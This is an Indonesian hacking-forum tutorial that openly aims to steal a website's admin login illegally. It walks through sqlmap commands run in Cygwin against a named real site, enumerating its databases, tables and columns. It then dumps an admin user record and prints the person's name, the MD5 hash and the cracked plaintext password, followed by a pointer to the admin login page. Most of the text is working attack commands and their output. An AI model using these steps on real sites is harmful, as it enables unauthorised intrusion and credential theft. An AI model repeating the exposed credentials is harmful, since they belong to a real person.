~WARNING~
Threat dibawah ini berisi banyak gambar, jadi maklum kalo gambarnya banyak yg gak nampak, itu karena koneksi kalian lemot, dan buka kesalahan TS-nya
oke gan
...pada tutorial di cmonhack ini ane akan ngebahas gmana cara ngedapetin username dan password admin website secara illegal gan pke sqlmap yg dijalankan di Cygwin
untuk metode sql injection biasa, biasanya klo mw inject, malah forbidden, 404 Not Found,
contoh :
*agan nemuin site ug vuln,
SS :
*kan ada pesan errornya tuh web, tpi setelah agan masukin perintah
+union+select+1,2,....12-- malah gak keluar tuh angka db nya, tpi web nya malah forbidden,
tpi klo pke metode yg ane share ini,..bisa aja nembus gan..hehe
summon
faiznurfaza,
gak usah kakehan ngomong cuk.
0. download project sqlmap nya >> langsung download gan
1. download Cygwin nya di situs rersminya gan.
2. setelah selesai download, langsung install Cygwinnya..agan cuma perlu
next, next, next, next , tapi pada bagian instalasi
Select Packages, pastikan semuanya sudah terinstal ..
3. Setelah komponen Cygwin terinstall semua, buka Cygwin
*sebelum tahap selanjutnya, agan2 perlu mengenal command2 dalam Sqlmap seperti :
-u (URL TARGET)
--dbs (Mendapatkan DATABASE dalam suatu WEBSITE)
-D (Masuk kedalam DATABASE)
--tables (Memeriksa ada berapa TABLES didalam DATABASE suatu WEBSITE)
-T (Masuk kedalam TABLE)
--columns (Memeriksa ada berapa COLUMNS didalam TABLE suatu WEBSITE)
-C (Masuk kedalam COLUMNS)
--dump (Mengeluarkan isi dari COLUMNS)4. setelah agan2 paham perintah2 nya, sekarang saatnya pengexploitan gan(gaya sitik)
5.
DAN jangan lupa, file
sqlmap.gzip yg kita download tadi masih di
Compress, jadi harus di
Extract dulu ya
saumpama ane extract di
D:\cmonhack\sqlmapSS:
---------------------------------------------------------------------------------------------------------
--Tahap Exploiting--
target inject =
[You must be registered and logged in to see this link.]1. Di Cygwin, tulis perintah untuk masuk ke Direktory dimana kita tadi menyimpan file download
sqlmap.gzip yg telah kita extract ..
saumpama kita Extract di
D:\cmonhack\sqlmap, jadi di Cygwin kita hrus masukin perintah :
- Code:
-
cd D:\cmonhack
2. Trus setelah itu, kita masukkan lagi
- Code:
-
cd sqlmap
3. Dan kita sudah masuk direktory sqlmap nya..
di dalam folder
D:\cmonhack\sqlmap, yg kita pakai untuk exploiting adalah file
sqlmap.py nya..
4. Jika Cygwin sudah masuk ke Direktory sqlmapnya, selanjutnya di Cygwin kita tulis perintah seperti :
- Code:
-
./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 --dbs
database :
[*] information_schema
[*] stirlin1_heritage5. Kita temukan 2 database seperi gambar di atas, tpi kita gunakan adalah database
stirlin1_heritage6. Proses selanjutnya, kita masukkan perintah seperti ini :
- Code:
-
./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 -D stirlin1_heritage --tables
dan hasilnya akan seperti ini :
itu adalah semua table yg telah dikumpulkan oleh om sqlmap..
7. Selanjutnya, kita akan melihat isi column dari salah satu table yaitu table
access dengan perintah seperi berikut :
- Code:
-
./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 -T access --columns
8. Terdapat 2 buah Colum pada table
access yaitu
pass dan
user seperti gambar di atas
+--------+----------+
| Column | Type |
+--------+----------+
| pass | tinytext |
| user | tinytext |
+--------+----------+
9. Langkah selanjutnya, kita lakukan dump ke column
pass dan
user, dgn cara :
- Code:
-
./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 -T access -C user,pass --dump
di situ, kita di suruh masukin perintah
Y atau
n atau
q, masukin aja perintah
Y trus Enter
10. Setelah di Enter, maka akan ada pesan kaya gini :
- Code:
-
what's the dictionary's location? [/cygdrive/d/cmonhack/sqlmap/txt/wordlist.txt]
klik
Enter aja
11. Lalu muncul lagi pesan
- Code:
-
do you want to use common password suffixes? (slow!) [y/N]
masukin
y trus Enter lagi
12. Trus tunggu sampai Proses BruteForce nya selesai 100%
13. Kalau dah selesai 100 persen, maka hasilnya akan seperti ini :
+----------------------------------+------------------------+
| pass | user |
+----------------------------------+------------------------+
| 6b92c50ef6dad109cada972ececead9b | Ros Stirling |
+----------------------------------+------------------------+
14. Ternyata bruteforce dri om sqlmap blum bisa decrypt password MD5 nya om, klo gitu, kita gunian MD5 Decrypter Online di
[You must be registered and logged in to see this link.]ternyata ketemu gan :
6b92c50ef6dad109cada972ececead9b :
secure55bm15. Skarang tinggal cari admin login nya om >>
[You must be registered and logged in to see this link.]tinggal masukin user dan password nya doank gan
:
user :
Ros Stirlingpass :
secure55bmKesimpulannya, jika kita make teknik sql injection biasa,,maka memungkin tidak akan berhasil dalam menjalankan attacking, karena bisa saja akan menemui
forbidden atau
404 not found di web nya, tpi jika kita pke sqlmap di cygwin, selain mudah dan praktis, web2 yg forbidden ato 404 not found tadi bisa di tembus
Have FUn gan
CREDIT : RieqyNS13